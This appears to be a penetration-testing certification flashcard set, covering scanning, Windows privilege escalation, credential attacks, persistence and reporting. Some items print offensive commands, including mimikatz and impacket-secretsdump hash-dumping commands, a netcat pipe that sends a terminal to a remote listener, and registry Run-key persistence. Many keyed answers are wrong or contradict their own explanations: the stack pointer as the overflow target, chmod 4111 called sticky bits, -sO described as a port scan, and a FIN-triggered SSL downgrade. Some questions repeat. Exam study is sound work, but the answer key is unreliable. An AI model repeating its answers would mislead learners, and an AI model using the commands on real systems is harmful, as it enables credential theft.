Need to Work On

What are the seven stages of the Cyber Kill Chain?

1. Reconnaissance 2. Weaponization 3. Delivery 4. Exploitation 5. Installation 6. Command and control 7. Actions on objectives

What is the default Windows search order for DLLs?

1. The directory the application is in 2. The current directory 3. The Windows system directory 4. The Windows directory 5. the directories listed in the PATH variable

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment? A. Selection of the appropriate set of security testing tools B. Current and load ratings of the ICS components C. Potential operational and safety hazards D. Electrical certification of hardware used in the test

A

Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow? A. Stack pointer register B. Index pointer register C. Stack base pointer D. Destination index register

A

Which of the following is an example of a spear phishing attack? A. Targeting an executive with an SMS attack B. Targeting a specific team with an email attack C. Targeting random users with a USB key drop D. Targeting an organization with a watering hole attack

A

What memory security technique makes ret2libc attacks much more difficult on modern Linux systems?

A SLR

Which of the following tools can be used by a system administrator to ensure the network is in configuration compliance? A.Nikto B. Tableau C. AFL D. IDA Pro

A. Although Nikto is usually considered a vulnerability scanner used by penetration testers, it can also be used by system administrators to verify configuration compliance within their networks, specifically with the configuration of their web servers

Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow? A. Stack pointer register B. Index pointer register C. Stack base pointer D. Destination index register

A. Stack pointer register

The username and password of admin/admin could be considered which of the following? A. Default credentials B. Susceptible to brute-force or password guessing attacks C. All the answer choices are correct. D. Weak credential

All of the answers are correct. All of the answers provided are examples of what the credentials admin/admin could be. A default credential is typically a password configured from the factory for embedded devices, Wi-Fi home routers, Internet of Things (IoT) devices, etc. Weak credentials are passwords that fail to meet some level of password complexity, which could leave the password susceptible to brute-force or password guessing attacks.

In Amazon's EC2, virtual machines are provided and can be controlled through a service API. Which of the following best defines this service? A. PaaS B. Public C. IaaS D. SaaS

Amazon's EC2 provides resizable compute capacity in the cloud via VMs that can be controlled via API, thus fitting the definition of IaaS.

The HTTPOnly attribute that can accompany a Set-Cookie response header is responsible for which of the following? A. Defining the domain where the cookie is valid. B. Preventing the cookie from being accessed via JavaScript. C. Setting the Secure flag to only allow for SSL connectors. D. Defining the URL where the cookie is valid.

B

The following command is run on a Linux file system: chmod 4111 /usr/bin/sudo Which of the following issues may be exploited now? A. Kernel vulnerabilities B. Sticky bits C. Unquoted service path D. Misconfigured sudo

B. Sticky Bits

What system contains a publicly available set of databases with registration contact information for every domain name on the Internet? A. IANA B. WHOIS C. IETF D. CAPTCHA

B. WHOIS is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system, but is also used for a wider range of other information. The protocol stores and delivers database content in a human-readable format and is publicly available for use.

A penetration tester successfully exploits a DMZ server that appears to be listening on an outbound port. The penetration tester wishes to forward that traffic back to a device. Which of the following are the BEST tools to use for this purpose? (Choose two.) A. Tcpdump B. Nmap C. Wireshark D. SSH E. Netcat F. Cain and Abel

BD

Which nmap script can be used to show potentially risky HTTP methods? A. http-risk B. http-get C. http-methods D. http-headers

C.

Which type of vulnerability scan sends SYN packets to network hosts to enumerate them? A. Discovery B. Full C. Stealth D. Compliance

C. A stealth scan enumerates hosts on the target network by sending them a SYN packet. If a SYN-ACK is received, then the scanner knows that the destination host exists. The SYN-ACK also contains a limited amount of information about the host that can be captured and analyzed by the scanner

Within a Bash script, you want to send the standard output and the standard error from the tail /var/log/firewall command to a file named lastevents in the current directory. Which command could you add to the script to do this? A. tail /var/log/firewall 1> lastevents 2> lastevents B. tail /var/log/firewall > lastevents C. tail /var/log/firewall 1> lastevents 2> &1 D. tail /var/log/firewall 1&2> lastevents

C. Adding the tail /var/log/firewall 1> lastevents 2> &1 command to a Bash script will send both stdout and stderr to the same file.

Which of the following refers to monitoring security configuration changes over time? A. Vulnerability management B. Change management C. Baselining D. Patch management

C. To develop a baseline, you take a snapshot of the current system's security controls and configuration settings. This can be compared to future states (monitored over time) to see what security and configuration changes have been made. Those that are valid go into the new baseline, and those that aren't are cut.

What is not an example of a type of support resource that a pentester might receive as part of a white box assessment? A. Network diagrams B. XSD C. PII of employees D. SOAP project files

C. White box support resources include Architectural diagrams, sample application requests, SDK documentation, SOAP project files, Swagger documents, WSDL/WADL, and XML Scheme Definitions.

What is not an example of a type of support resource that a pentester might receive as part of a white box assessment? A. XSD B. Network diagrams C. PII of employees D. SOAP project files

C. White box support resources include Architectural diagrams, sample application requests, SDK documentation, SOAP project files, Swagger documents, WSDL/WADL, and XML Scheme Definitions.

You have an FTP service and an HTTP site on a single server. Which DNS record allows you to alias both services to the same record (IP address)? A. PTR B. SOA C. NS D. CNAME

CNAME (Canonical Name) records provide for aliases within the zone. Incorrect Answers: NS records represent name servers. SOA is the Start of Authority record. PTR records map an IP address to a host name (providing for reverse DNS lookups).

The unquoted service path vulnerability can be used to escalate privileges on a Windows target and exploits what function of the operating system? A. Windows registry B. Weak access controls C. Task Scheduler D. CreateProcess

CreateProcess is correct. Unquoted er:service paths are a direct result of the CreateProcess function in Windows operating systems, where the name of a directory or program in the search path is truncated when the function identifies a blank space in the path. Windows will attempt to load each truncated executable until it finds the correct one.

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled ''changepass." -sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass Using "strings" to print ASCII printable characters from changepass, the tester notes the following: $ strings changepass exit setuid strcmp GLIBC_2.0 - ENV_PATH - %s/changepw malloc strlen Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine? A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass. B. Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environmental variable to the path '/home/user/'. Then run changepass. C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw. Then run changepass. D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'.

D

You are conducting a white box penetration test for a client. You need to use the nmap utility on your laptop to run a scan of every host on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0). Which commands could you use to do this? (Choose two.) A. nmap 192.168.1.0 B. nmap 192.168.1.0-255 C. nmap 192.168.1.0 -m:255.255.255.0 D. nmap 192.168.1.0/24 E. nmap 192.168.1.1-254

D and E. The nmap 192.168.1.0/24 command causes the nmap utility to scan every system on the subnet, from .1 to .254. Likewise, the nmap 192.168.1.1-254 command causes the nmap utility to scan every system on the subnet, from .1 to .254

Gary is conducting a black box penetration test against an organization and is gathering vulnerability scanning results for use in his tests. Which one of the following scans is most likely to provide him with helpful information within the bounds of his test? A. Stealth internal scan B. Full internal scan C. Stealth external scan D. Full external scan

D. A full scan is likely to provide more useful and actionable results because it includes more tests. There is no requirement in the scenario that Gary avoid detection, so a stealth scan is not necessary. However, this is a black box test, so it would not be appropriate for Gary to have access to scans conducted on the internal network

What type of penetration test is not aimed at identifying as many vulnerabilities as possible and instead focuses on vulnerabilities that specifically align with the goals of gaining control of specific systems or data? A. An objectives-based assessment B. A compliance-based assessment C. A black-team assessment D. A red-team assessment

D. A red-team assessment is intended to simulate an actual attack or penetration, and testers will focus on finding ways in and maximizing access rather than comprehensively identifying and testing all the vulnerabilities and flaws that they can find

Which open source research source ranks security vulnerabilities by their severity? A. CERT B. Full Disclosure C. CVE D. NVD

D. The National Vulnerability Database (NVD) website provides a summary of current security vulnerabilities ranked by their severity.

What criteria should be used to determine vulnerability scan targets?

Data classification, system exposure, services offered, & test/production/development status

You are a penetration tester, and you have just completed testing for a new client. You have revealed that a legacy web application is vulnerable to SQL injections. The client indicates that remediating the vulnerability would require an architectural change and management does not want to risk anything happening to the current application. Which of the following conditions would minimize the SQL injection risk while proving a low-effort and short-term solution? (Choose two.) A. From the stored procedures, identify and remove the dynamic SQL. B From the code, identify and remove the inline SQL statements. C Identify and sanitize all user inputs. D. Identify the source of malicious input and block the IP address. E. For the SQL statements, use a blacklist validation. F. For the SQL statements, use a whitelist validation.

E and F. Given this scenario, the client will want to use a blacklist and whitelist validation for the SQL statements. SQL injection is a common attack route that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. SQL injections are one of the most common web hacking techniques. Blacklist validation tests the external input against a set of known malicious inputs. Whitelist validation tests an external input against a set of known, approved input. With whitelist input validation, the application knows exactly what is wanted and rejects other input

What replay attack is used with NTLM hashes?

Pass-the-hash attacks

Which of the following Windows shares are readable on the local area network by default? A. All the answer choices are correct B. C$ C. IPC$ D. ADMIN$

IPC$ is correct. The IPC$ share, also known as the null session share, allows anonymous hosts on the network to perform certain activities such as enumerating domain accounts and network shares.

What web application attack is characterized by the use of an integer identifier in a query string?

Insecure Direct Object References (IDOR)

What does an SSL downgrade attack send to a target to cause the downgrade?

It falsifies a FIN from the legitimate server, causing the client to try to renegotiate to a less secure protocol

Which of the following is a valid reason for executing an authenticated vulnerability scan against a target? A. You will be able to show more impact in your test results. B. It helps reduce false positives. C. It produces more findings. D. The scan will help exploit target weaknesses and carry out post-exploitation activities.

It helps to reduce false positives is correct. Executing an authenticated vulnerability scan can help reduce the number of false positives reported by a vulnerability scanner, as the credential used during the scan will have the ability to verify a patch or configuration setting, whereas an unauthenticated scan will go off a service banner or trivial fuzzing technique that may or may not be enough to guess at the existence of a vulnerability.

Which type of confidential document covers items such as social responsibility, business ethics, network and facility access, and so forth? A. NDA B. MSA C. SOW D. RoE

MSA is correct. The master service agreement (MSA) is a type of overarching contract between two or more parties where each party agrees to most terms that will govern all other future transactions and agreements, such as payment terms, dispute resolution, social responsibility, business ethics, network and facility access, etc

NIST SP 800-30 defines this as the step that determines whether any weaknesses exist in an organization's systems, policies, or procedures. Which of the following best matches this definition? A. Risk determination B. Threat identification C. Vulnerability identification D. Impact analysis

NIST SP 800-30 defines nine steps in risk assessments:1. Purpose, scope, and source identification, or system characterization 2.Threat identification 3.Vulnerability identification 4.Control analysis 5.Likelihood determination 6.Impact analysis 7.Risk determination 8.Communicating and sharing risk assessment information 9.Maintaining the risk assessment. Step 3 (vulnerability identification) determines whether any flaws or weaknesses might exist in a company's systems, policies, or procedures.

Which of the following is an example of a logical control? A. Security tokens B. Security policy C. Fire alarms D. Guards

Of the answers provided, security tokens are the only example of a logical (technical) control.

What condition does Responder have to meet to successfully acquire credentials?

Respond to the target faster than the legitimate server

Which fully executed document provides authorization from an organization to conduct a pentest and will include or elaborate on subjects defined in the SOW? A. NDA B. RoE C. MSA D. Contractual Agreement

RoE is correct. The rules of engagement (RoE) document puts into writing the guidelines and constraints regarding the execution of a pentest and typically elaborates on subjects defined in the SOW, such as the testing methodology, target selection, etc. Once the RoE is signed by an authorizing official within the organization (executive management) and all other respective parties, the fully executed (FE) document provides the pentest team with the authorization to carry out the agreed-upon terms and conditions.

Which network share is available to any member of an organization's Windows Active Directory domain and holds Group Policy Preferences (GPP) to help automate tedious administrative tasks? A. SYSVOL B. C$ C. IPC$ D. ADMIN$

SYSVOL is correct. SYSVOL is a shared directory used to store logon scripts, Group Policy data, and other domain-wide data that is viewable by any user who is a member of the domain.

What is the first step in most kerberoasting attacks?

Scanning Active Directory for user accounts with Service Principal Name (SPN)

Your team is testing a server that serves PHP pages for the Shellshock vulnerability. Which of the following actions should you take? A. Create special HTML entries for web forms B. Send specially created environment variables and trailing commands. C. Modify the URL parameters. D. Craft specific SQL entries to attacks the vulnerability

Shellshock allows an attacker to add trailing information in environment variables.

Name two methods used by NAC devices to identify new connections

Software clients, DHCP proxies, broadcast listeners, SNMP traps

The schedule is an important element to include in the report, as it helps put findings into perspective, such as how long it took to find a particular vulnerability and the time it took to exploit it. This section in the report can be referred to as what? A. Observations B. Methodology C. Timeline D. Issues

Timeline is correct. The timeline is an important part for senior leadership to understand because it puts findings into perspective, such as how long it took to find the vulnerability, the time it took to exploit it, and so on.

What is senior (executive) management's role in a top-down management approach? A. To carry out the plan of action for the organization B. None of the answer choices are correct C. To update the organization's policy documentation D. To dictate goals and objectives

To dictate goals and objectives is correct. A top-down management approach is when senior management dictates goals and objectives regarding a project or task.

You are performing tests from a Cisco device. Which of the following commands should be used to help identify a packet's path to its destination? A. tracert B. ipconfig C. ping D. traceroute

Traceroute is a good tool to show a packet's path to its destination. On a Windows machine, the command is tracert, and the tool uses TTL to map each hop along the way. On virtually everything else (including Linux and most Cisco devices), the command is traceroute, and the tool uses UDP instead.

What are the three main categories of remediation strategy?

Technology, People, & Process

You have network IPS set up, along with multiple other tools for security controls. This morning before you came to work, hackers successfully attacked the network. In investigating, you see that the IPS saw the traffic coming into the network and leaving, but did not alert on it. Which of the following best describes what the IPS noted? A. True negative B. True positive C. False negative D. False positive

The IPS saw the traffic, obviously, but made a decision it was good traffic when it was, indeed, naughty. It should have triggered as a positive hit, but instead allowed it to pass with no action. This is known as a "false negative."

In which phase of the Security Development Lifecycle is "fuzz" testing performed? A. Verification B. Design C. Implementation D. Release

The Security Development Lifecycle (SDL) phases include Training, Requirements, Design, Implementation, Verification, Release, and Response, and each phase holds specific actions. For example, in the Training phase, core security training for developers is performed. In the Requirements phase, the level of security desired is set. In the Verification phase, dynamic analysis, fuzz testing, and attack surface reviews are performed.

Which of the following is a legitimate use for tcp-over-dns? A. Packet crafting B. Network sniffing C. OS fingerprinting D. Firewall evasion

Tunneling through a firewall is a great evasion technique, and the tcp-over-dns tool accomplishes this by tunneling over the Domain Name System (DNS). Port 53 is usually open on firewalls because...well, everything uses and needs DNS. The tcp-over-dns tool takes advantage of that. As an aside, it also requires Java runtime environment 6.0 or later and is supported on Windows, Linux, and Solaris.

What potential vulnerability can be found simply by reviewing the properties of Windows services from the service manager service listing?

Unquoted service paths

Which of the following best describes a hybrid password-cracking attack? A. It uses dictionary file to crack the password B. It substitutes numbers and characters in words to discover a password. C. It uses a combination of letters, numbers, and special characters in random order to crack the password. D. It uses a rainbow table to crack the password. `

Usually a hybrid attack involves a list of passwords that get altered along the way in order to guess the password. For example, if your list contained the word "Fishing," a hybrid attack would start substituting numbers and characters: f1$hing, Fi$H1n6, and so on.

What are the two forms of input validation?

Whitelisting & Blacklisting

Which of the following commands can help recover the list of local hashes from the SAM database? (Choose three.) A. mimikatz_command -f samdump::hashes B. The windows reg command C. impacket-secretdump [user]:[pass]@[IP] D. mimikatz_command -f samdump::

`mimikatz_command -f samdump::hashes` is correct because it will use Mimikatz to dump the list of local hashes from the SAM database. `impacket-secretsdump [user]:[pass]@[ipaddress]` is correct because it will use Impacket (the version installed in Kali) to dump the SAM database remotely from a target host over the network without executing any type of an agent. `impacket-secretsdump [user]:[pass]@[ipaddress]` is correct because the local Windows reg command can be used to save the contents of the System and SAM databases.

Which of the following are vulnerabilities associated with the SNMPv1 protocol? (Choose two.) A. The community string is valid for every SNMPv1 node. B. The community string is transmitted as clear text. C. The community string uses the weak RC2 cipher. D. No authentication is required to communicate with an SNMPv1 host. E. The Management Information Base (MIB) is stored in unencrypted format.

A and B. The SNMPv1 protocol is an older protocol that uses the concept of a community string instead of a password. The same community string is used to authenticate to every SNMPv1 host in the network. By convention, most SNMPv1 administrators set the community string to a value of public. Even if a unique community string were used, it was easy to discover because it was transmitted as clear text on the network

Which of the following are ways in which services on a Windows system can be exploited? (Choose two.) A. Using unquoted service paths B. Replacing executables for writable services C. Implementing a cold boot attack D. Compromising credentials in LSASS

A and B. Using unquoted paths to services is one way that services can be exploited on a Windows system. By not quoting paths to services, any spaces in a directory name won't be processed correctly and can cause a malicious service executable located deliberately in the resulting unquoted directory path to be loaded instead of the correct service executable. In addition, writeable service executable files can be replaced with malicious executables with the same file name.

You have just concluded a black box penetration test for a client. During the test, you were able to access the organization's wireless network from the parking lot using your laptop running Aircrack-ng. In your final report, what should you recommend the client do to remediate this issue? (Choose two.) A. Use directional antennae on all access points. B. Reconfigure the Wi-Fi equipment to use WEP encryption. C. Upgrade to newer Wi-Fi equipment that supports modern encryption methods. D. Disable DHCP on the wireless network

A and D. In this scenario, the wireless network can be hardened by using directional access points. This will help prevent the signal from emanating into the parking lot. In addition, DHCP should be disabled on the wireless network. While this makes administration much more difficult, it also prevents attackers who compromise the wireless network from automatically receiving all the configuration information they need to access network resources

ICMP packets do not work in identifying targets on a particular subnet. Which of the following is the best option in this situation? A. Nslookup B. Traceroute C. TCP ping D. Broadcast ping

A single target not responding doesn't necessarily means it's not "awake"--there could be several reasons why it's not providing any answer. If you suspect ICMP is blocked, try a TCP ping. The integrated Windows ping utility can't ping over TCP, so you may have to use tcping.exe (or another comparable tool).

You are a penetration tester, and you are conducting a test for a new client. While attempting phishing, you were able to retrieve the initial VPN user domain credentials from a member of the IT department. Then you obtained hashes over the VPN and effortlessly cracked them by using a dictionary attack. What remediation steps should you recommend to the client? (Choose three.) A. Recommend increased password complexity requirements. B. Recommend implementing two-factor authentication for remote access. C. Recommend installing an intrusion prevention system. D. Recommend installing a security information event monitoring solution. E. Recommend preventing members of the IT department from interactively logging in as administrators. F. Recommend requiring that all employees take security awareness training. G. Recommend upgrading the cipher suite used for the VPN solution.

A, F, and G. In this scenario, the tester should recommend that the client increase their password complexity requirements since the tester was able to crack them by using a dictionary attack. The tester should also recommend that all employees take security awareness training, since it was a member of the IT department who gave up pertinent information when the tester used a phishing technique. The tester should also recommend upgrading the cipher suite that is used for the VPN solution. A cipher suite is a set of algorithms that help secure network connections that use Transport Layer Security (TLS) or Secure Socket Layer (SSL). The algorithms that cipher suites usually contain include a key exchange algorithm, a bulk encryption algorithm, and a message authentication code (MAC) algorithm.

What NMAP switch would a hacker use to attempt to see which ports are open on a targeted network? A. -sO B. -sS C. -sU D. -sP

A. -sO is used to determine which IP protocols (TCP, UDP, ICMP, IGMP, etc) are supported and open on the targeted machine and is the correct answer. -sU will only scan UDP ports. -sS will only scan TCP ports using a SYN scan. -sP is a legacy (and depreciated) command for a ping scan.

Which of the following statements is true about command injection vulnerabilities? A. All of these answers are correct. B. Command injection is an attack in which an attacker tries to execute commands that he or she is not supposed to be able to execute on a system via a vulnerable application C. Command injection attacks are possible when an application does not validate data supplied by the user (for example, data entered in web forms, cookies, HTTP headers, and other elements). D. The vulnerable system passes that data into a system shell

A. A command injection is an attack in which an attacker tries to execute commands that he or she is not supposed to be able to execute on a system via a vulnerable application. Command injection attacks are possible when an application does not validate data supplied by the user (for example, data entered in web forms, cookies, HTTP headers, and other elements). The vulnerable system passes that data into a system shell

Which type of vulnerability scan is least likely to be detected by an intrusion prevention system (IPS) or intrusion detection system (IDS)? A. Discovery B. Full C. Stealth D. Compliance

A. A discovery scan is designed to simply map out every system on the target network using very nonintrusive mechanisms (such as ping) to enumerate the network. Because of this, this type of scan is the least likely to be detected by an IDS or IPS device.

What type of scan will measure the size or distance of a person's external features with a digital video camera? A. Facial recognition scan B. Signature kinetics scan C. Iris scan D. Retinal scan

A. A face recognition system is a computer application capable of identifying or verifying a person from a digital image or a video frame from a video source. One of the ways to do this is by comparing selected facial features from the image and a face database. This is done by measuring the external features of your face (such as the distance between your eyes and nose) to identify a user.

Which of the following is not true about elicitation and interrogation? A. An interrogator cannot use closed-ended questions to gain more control of the conversation. B. An interrogator asks good open-ended questions to learn about the individual's viewpoints, values, and goals. C. An interrogator uses any information revealed to continue to gather additional information or to obtain information from another victim D. An interrogator uses closed-ended questions to gain more control of the conversation and to lead the conversation or to stop it

A. An interrogator asks good open-ended questions to learn about the individual's viewpoints, values, and goals. An interrogator uses any information revealed to continue to gather additional information or to obtain information from another victim. An interrogator uses closed-ended questions to gain more control of the conversation and to lead the conversation or to stop it.

You are a performance tester, and you are discussing performing compliance-based assessments for a client. Which is an important key consideration? A. Any additional rates B. Any company policies C. The industry type D. The impact tolerance

A. Budgeting is a key factor of the business process of penetration testing. A budget is required to complete a penetration test and is determined by the scope of the test and the rules of engagement. For internal penetration testers, a budget may just involve the allotted time for the team to perform testing. For external testers, a budget usually starts with the estimated number of hours based on the intricacy of the testing, the size of the team, and any associated costs

A security analyst wants to implement a layered defense posture for this network, so he decides to use multiple layers of antivirus defense, including both an end-user desktop antivirus software and an email gateway scanner. What kind of attack would this approach help to mitigate? A. Social engineering attack B. Scanning attack C. ARP spoofing attack D. Forensic attack

A. By utilizing both endpoint protection (desktop antivirus software) and the email gateway scanner, the security analyst is working to prevent phishing and other social engineering attacks.

What type of technique does exploit chaining often implement? A. Injecting parameters into a connection string using semicolons as a separator B. Settings a user's session identifier (SID) to an explicit known value C. Adding multiple parameters with the same name in HTTP requests. D. Inserting malicious JavaScript code into input parameters

A. Connection String Parameter Pollution (CSPP) exploits specifically the semicolon delimited database connection strings that are constructed dynamically based on the user inputs from web applications. CSPP, if carried out successfully, can be used to steal user identities and hijack web credentials. CSPP is a high risk attack because of the relative ease with which it can be carried out (low access complexity) and the potential results it can have (high impact).

A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline? A. Discovery scan B. Stealth scan C. Full scan D. Credentialed scan

A. Discovery scan

A firewall administrator has configured a new DMZ to allow public systems to be segmented from the organization's internal network. The firewall now as three security zones set: Untrusted (Internet) [143.27.43.0/24]; DMZ (DMZ) [161.212.71.0/24]; Trusted (Intranet) [10.10.0.0/24]. The firewall administrator has been asked to enable remote desktop access from a fixed IP on the remote network to a remote desktop server in the DMZ in order for the Chief Security Officer to be able to work from his home office after hours. What rule should the administrator add to the firewall? A. Permit 143.27.43.32 161.212.71.14 RDP 3389 B. Permit 143.27.43.0/24 162.213.71.0/24 RDP 3389 C. Permit 143.27.43.32 162.213.71.0/24 RDP 3389 D. Permit 143.27.43.0/24 161.213.71.14 RDP 3389

A. Due to the requirement to allow a single remote IP to enter the firewall, the permit statement must start with a single IP in the Untrusted (Internet) zone. Based on the options provided, only 143.27.43.32 could be correct. Next, the destination is a single server in the DMZ, so only 161.212.71.14 could be correct. The destination port should be 3389, which is the port for Remote Desktop Protocol. Combining these three facts, only "permit 143.27.43.32 161.212.71.14 RDP 3389" could be correct.

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task? A. From the remote computer, run the following commands:export XHOST 192.168.1.10:0.0xhost+Terminal B. From the local computer, run the following command:ssh -L4444:127.0.0.1:6000 -X [email protected] xterm C. From the remote computer, run the following command:ssh -R6000:127.0.0.1:4444 -p 6000 [email protected] xhost+; xterm D. From the local computer, run the following command:nc -l -p 6000Then, from the remote computer, run the following command:xterm | nc 192.168.1.10 6000

A. From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0xhost+Terminal

You work for a penetration testing firm. You have been scoping an upcoming penetration test with a client. Within the scope document, you include verbiage warning that the methodology and techniques used for this test could potentially take critical systems offline for a period of time. You ask the client to confirm that this is acceptable. What is this an example of? A. Assessing impact tolerance B. A comprehensiveness disclaimer C. A point-in-time disclaimer D. Rules for completing the assessment

A. In this example, you are assessing the client's tolerance for impacts. By including this verbiage within the scope, you protect your organization from litigation if the penetration test truly does knock critical systems offline.

An assessor begins an internal security test of the Windows domain internal.comptia.net. The assessor is given network access via DHCP, but is not given any network maps or target IP addresses. Which of the following commands can the assessor use to find any likely Windows domain controllers? A. dig -q any _kerberos._tcp.internal.comptia.net B. dig -q any _lanman._tcp.internal.comptia.net C. dig -q any _ntlm._tcp.internal.comptia.net D. dig -q any _smtp._tcp.internal.comptia.net

A. dig -q any _kerberos._tcp.internal.comptia.net

Which of these statement is true concerning LM hashes? A. LM hashes are not generated when the password length exceeds 15 characters B. LM hashes consist of 48 hexadecimal characters. C. Uppercase characters in the password are converted to lowercase D. LM hashes are based on AES128 cryptographic standard

A. LM hash, also known as LanMan hash or LAN Manager hash, is a compromised password hashing function that was the primary hash that Microsoft LAN Manager and Microsoft Windows versions prior to Windows NT used to store user passwords. Support for the legacy LAN Manager protocol continued in later versions of Windows for backward compatibility, but was recommended by Microsoft to be turned off by administrators due to the weak strength of the LM hash. LM hashes are not generated when the password length exceeds 15 characters since it is stored as a 16-byte value

Windows file servers commonly hold sensitive files, databases, passwords and more. What common vulnerability is usually used against a windows file server to expose sensitive files, databases, and passwords? A. Missing patches. B. Cross-site scripting C. CRLF injection D. SQL injection

A. Missing patches is the most common vulnerability found on both Windows and Linux systems. When a security patch is released, attackers begin to reverse engineer the security patch to exploit the vulnerability. If your servers are not patched against the vulnerability, they can become a victim of the exploit and the data contained on the server can become compromised.

A penetration tester reviews social media accounts owned by the target organization's CIO and makes a list of possible passwords such as her spouse's name, pet's name, favorite sports teams, and so on. The tester tries to log on to the CIO's account using one possible password after another, trying to find one that works. What type of authentication exploit is this? A. Credential brute-forcing B. Session hijacking C. Redirect attack D. Password cracking

A. This is an example of a credential brute-forcing attack. In a true brute-force attack, all possible letter, number, and special character combinations would be tried one after another until the right one is found. However, by creating a list of likely passwords based on the user's personal interests, the probability of success is greatly increased.

Which of the following is a consideration in vulnerability scanning? Each correct answer represents a complete solution. Choose all that apply. A. Bandwidth Limitations B. Network Topology C. Considering the best time to run a scan D. None of these answers are correct.

ABC. Considering the best time to run a scan, different network topologies, bandwidth limitations, query throttling, and fragile systems are all things to consider when launching a vulnerability scan against your network.

A penetration tester has gained access to a marketing employee's device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regained. Which of the following actions should the penetration tester use to maintain persistence to the device? (Select TWO.) A. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1. B. Place an entry in C:\windows\system32\drivers\etc\hosts for 12.17.20.10 badcomptia.com. C. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1. D. Create a fake service in Windows called RTAudio to execute manually. E. Place an entry for RTAudio in HKLM\CurrentControlSet\Services\RTAudio. F. Create a schedule task to call C:\windows\system32\drivers\etc\hosts.

AC

A penetration tester is conducting a test, and after compromising a single workstation, the tester is able to maneuver laterally throughout the domain with very few roadblocks. Which migration strategies should be recommended for the report to the client? (Choose three.) A. Apply additional network access control. B. For all logons, require multifactor authentication. C. For each machine, randomize local administrator credentials. D. For local administrators, disable remote logons. E. Increase minimum password complexity requirements. F. Put each host into its own virtual local area network (VLAN). G. On every workstation, enable full-disk encryption.

B, E, and G. In this situation, since the tester was able to compromise a single workstation and is able to move laterally through the network, the best recommendations to give the client would be the following: Use multifactor authentication. Multifactor authentication (MFA) is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism. Increase minimum password complexity. Complex passwords use different types of characters in unique ways to increase security, making it harder for an attacker to crack. Enable full-disk encryption. Full-disk encryption (FDE) is encryption at the hardware level. FDE works by automatically converting data on a hard drive into a form that cannot be understood by anyone who doesn't have the key to "undo" the conversion

Which of the following is true about WPA? A. All versions of WPA support different authentication methods, including PSK B. All of these answers are correct. C. It is possible to capture the WPA four-way handshake between a client and a wireless infrastructure device and then brute-force the WPA PSK. D. WPA is not susceptible to the IV attacks that affect WEP

B. All versions of WPA support different authentication methods, including PSK. WPA is not susceptible to the IV attacks that affect WEP; however, it is possible to capture the WPA four-way handshake between a client and a wireless infrastructure device and then brute-force the WPA PSK.

A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform? A. Command injection attack B. Clickjacking attack C. Directory traversal attack D. Remote file inclusion attack

B. Clickjacking attack

A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this? A. Appendices B. Executive summary C. Technical summary D. Main body

B. Executive Summary

A pentester is trying to map the organization's internal network. The analyst enters the following command (nmap -n -sS -T4 -p 80 10.0.3.0/24). What type of scan is this? A. Quick scan B. Stealth Scan C. Intense Scan D. Comprehensive Scan

B. In NMAP, the -S command signifies a stealth scan. This is also known as a SYN scan, and is the most popular scan option, for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy, since it never completes TCP connections.

Which one of the following is NOT a reason to conduct periodic penetration tests of systems and applications? A. Changes in the environment B. Cost C. Evolving threats D. New team members

B. Repeating penetration tests periodically does not provide cost benefits to the organization. In fact, it incurs costs. However, penetration tests should be repeated because they can detect issues that arise due to changes in the tested environment and the evolving threat landscape. The use of new team members also increases the independence and value of subsequent tests

What term describes the amount of risk an organization is willing to accept? A. Risk mitigation B. Risk appetite C. Risk avoidance D. Risk acceptance

B. Risk appetite describes how much risk an organization is willing to accept. This is a crucial factor both in designing the assessment and determining recommended mitigations.

Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads? A. Creating a scope of the critical production systems B. Setting a schedule of testing access times C. Establishing a white-box testing engagement D. Having management sign off on intrusive testing

B. Setting a schedule of testing access times.

A penetration tester has exploited an FTP server using Metasploit and now wants to pivot to the organization's LAN. What is the best method for the penetration tester to use to conduct the pivot? A. Issue the pivot exploit and setup meterpreter B. Create a route statement in meterpreter C. Reconfigure the network settings in meterpreter. D. Set the payload to propagate through meterpreter.

B. Since the penetration tester has been able to exploit the FTP server from outside the LAN, they will need to setup a route statement in meterpreter. Metasploit make this very simple, since it also has an autoroute meterpreter script that will allow us to attack this second network through our first compromised machine (the FTP server) by creating the routes we need.

Which Bash script command will create a new variable named TOTAL and set its type to be integer? A. variable -i TOTAL B. declare -i TOTAL C. declare TOTAL -t integer D. TOTAL=integer

B. The declare -i TOTAL command will create the TOTAL variable and type it as integer.

What kind of attack is an example of IP spoofing? A. ARP poisoning B. Man-in-the-Middle C. SQL injections D. Cross-site scripting

B. The man-in-the middle attack intercepts a communication between two systems. For example, in an http transaction the target is the TCP connection between client and server. Using different techniques, the attacker splits the original TCP connection into 2 new connections, one between the client and the attacker and the other between the attacker and the server. This often uses IP spoofing to trick a victim into connecting to the attack.

